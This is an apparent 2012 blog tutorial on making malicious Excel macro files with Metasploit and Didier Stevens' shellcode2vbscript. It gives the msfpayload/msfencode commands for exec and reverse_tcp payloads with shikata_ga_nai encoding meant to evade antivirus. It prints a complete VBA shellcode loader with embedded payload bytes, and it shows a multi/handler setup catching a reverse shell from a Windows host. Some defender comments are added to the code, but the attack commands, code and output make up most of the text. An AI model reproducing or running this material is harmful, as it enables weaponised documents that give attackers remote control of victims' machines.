Friday, June 22, 2012

Create Malicious Excel files using Metasploit and Shellcode2vbscript


First, let's create our shellcode using Metasploit's msfpayload:
For windows/exec payload:
Code:
root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \
                -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R
 
[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 254 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 281 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=5)
For reverse_tcp payload:
Code:
root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \
  -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R
 
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
For your own executable file:
Code:
root@coresec:~# msfencode -i backdoor.exe -e  x86/shikata_ga_nai -c 10 \
  -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R
 
[*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5)
The next step is to convert the shellcode to VBScript using the shellcode2vbscript_v0_1 Python tool from Didier Stevens:
Code:
root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
--2011-04-23 14:30:31--  http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
Resolving www.didierstevens.com... 173.201.107.126
Connecting to www.didierstevens.com|173.201.107.126|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1378 (1.3K) [application/x-zip-compressed]
Saving to: `shellcode2vbscript_v0_1.zip'
 
100%[===========================================================>] 1,378       --.-K/s   in 0s      
 
2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378]
 
root@coresec:~# mkdir shellcode2vbscript
root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript
Archive:  shellcode2vbscript_v0_1.zip
  inflating: shellcode2vbscript/shellcode2vbscript.py
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs
root@coresec:~# ls -al CALC.vbs RVR.vbs
-rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs
-rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs
Now that our VBScripts are ready, let's look at the code of CALC.vbs:
Code:
' Win32 API imports used by the loader below.
' NOTE: "Private Declare Function ... Lib" is VBA (Office macro) syntax, not
' VBScript, which is why the generated file is embedded in an .xlsm workbook
' rather than run as a standalone script.
' Defender note: a macro module that declares VirtualAlloc, WriteProcessMemory
' and CreateThread together is a classic in-process shellcode-loader pattern;
' static macro scanners and EDR rules commonly key on exactly this trio.
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long

' MEM_COMMIT + PAGE_EXECUTE_READWRITE asks for a committed region that is
' writable AND executable (RWX). An RWX allocation made from an Office host
' process is itself a strong behavioural indicator worth alerting on.
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
 
' Copies the embedded payload into a freshly allocated RWX buffer inside the
' current (Office) process and starts a new thread at that address.
' How this Sub gets invoked (e.g. from a workbook event) is not shown in this
' listing; the loader itself has no trigger of its own.
' None of the API return values are checked, so a failed allocation or write
' is silently ignored.
Private Sub ExecuteShellCode()
        Dim lpMemory As Long
        Dim sShellCode As String
        Dim lResult As Long

        ' Raw payload bytes as one VBA string (assembled by ShellCode() below).
        sShellCode = ShellCode()
        ' Reserve an RWX buffer exactly the size of the payload.
        lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        ' hProcess = -1 is the pseudo-handle for the calling process, so this is
        ' a self-write rather than an injection into another process.
        lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
        ' lpStartAddress = the buffer: execution of the payload begins here, in a
        ' thread owned by the Office host process (the key detection point).
        lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub
 
' Decodes a space-separated list of decimal byte values ("218 203 184 ...")
' into a string with one character per byte.
' Arguments: strBytes - decimal values separated by spaces (split() default).
' Returns:   the decoded bytes as a String, in input order.
' Storing the payload as decimal text is a simple obfuscation: there are no
' printable shellcode bytes or hex escapes for a naive string scan to find.
Private Function ParseBytes(strBytes) As String
        Dim aNumbers
        Dim sShellCode As String
        Dim iIter

        sShellCode = ""
        aNumbers = split(strBytes)
        for iIter = lbound(aNumbers) to ubound(aNumbers)
                ' Chr() turns each numeric token into a single character.
                sShellCode = sShellCode + Chr(aNumbers(iIter))
        next

        ParseBytes = sShellCode
End Function
 
' First (and here only) chunk of the payload: the encoded bytes emitted by
' msfencode (CALC.R), written out as fixed-width lines of decimal values.
' Defender note: these constants change with every encoder run and iteration
' count, so matching on them is brittle; the API declarations and the RWX
' allocation in ExecuteShellCode are the stable indicators.
Private Function ShellCode1() As String
        Dim sShellCode As String

        sShellCode = ""
        sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3")
        sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184")
        sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188")
        sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25")
        sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245")
        sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53")
        sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143")
        sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185")
        sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91")
        sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86")
        sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192")
        sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205")
        sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32")
        sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186")
        sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249")

        ShellCode1 = sShellCode
End Function
 
' Assembles the full payload string from its chunk functions.
' Only ShellCode1 exists in this file; the extra level of indirection
' presumably lets the generator split larger payloads across several
' functions (not shown here).
' Returns: the complete decoded payload as a String.
Private Function ShellCode() As String
        Dim sShellCode As String

        sShellCode = ""
        sShellCode = sShellCode + ShellCode1()

        ShellCode = sShellCode
End Function
Then we can insert the malicious VBScript into our Excel files as macros (CALC.vbs -> CALC.xlsm and RVR.vbs -> RVR.xlsm):
Finally, let's set up the handler and execute our macros:
Code:
root@coresec:~# msfconsole 
 
                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|
 
       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 680 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12397 updated yesterday (2011.04.21)
 
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.200.20
lhost => 192.168.200.20
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
 
[*] Started reverse handler on 192.168.200.20:4444
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.200.2
[*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011
 
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Users\coresec\Documents>
NoVirusThanks results:
Download:
Suggestions and comments are welcome
